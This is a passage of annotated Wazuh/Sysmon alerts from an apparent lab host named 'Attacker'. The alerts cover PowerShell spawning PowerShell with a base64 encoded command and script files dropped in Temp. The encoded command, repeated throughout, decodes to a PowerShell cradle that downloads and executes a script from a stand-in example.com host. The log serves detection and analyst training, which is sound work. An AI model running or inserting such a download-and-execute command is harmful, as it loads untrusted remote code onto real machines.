ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:49.622 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb5-680a-b50b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4872 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10488 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 99 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534393.1922075 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:50.7752700Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285522 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:50.758
ProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00}
ProcessId: 4872
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rhjxvxaz.15p.ps1
CreationUtcTime: 2025-04-24 22:39:50.758
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:50.758 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb5-680a-b50b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4872 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rhjxvxaz.15p.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:50.758 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 100 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534396.1924840 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:53.8734294Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285544 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:53.831
ProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00}
ProcessId: 3664
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_nilkcvgi.iyi.ps1
CreationUtcTime: 2025-04-24 22:39:53.831
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:53.831 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb8-680a-b70b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nilkcvgi.iyi.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:53.831 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 96 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534396.1927605 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:53.6430596Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285543 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:52.022
ProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00}
ProcessId: 3664
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00}
ParentProcessId: 4872
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:52.022 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb8-680a-b70b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4872 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 97 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534398.1935668 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:56.4053078Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285565 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:55.189
ProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00}
ProcessId: 12340
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00}
ParentProcessId: 3664
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:55.189 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdbb-680a-b90b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12340 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
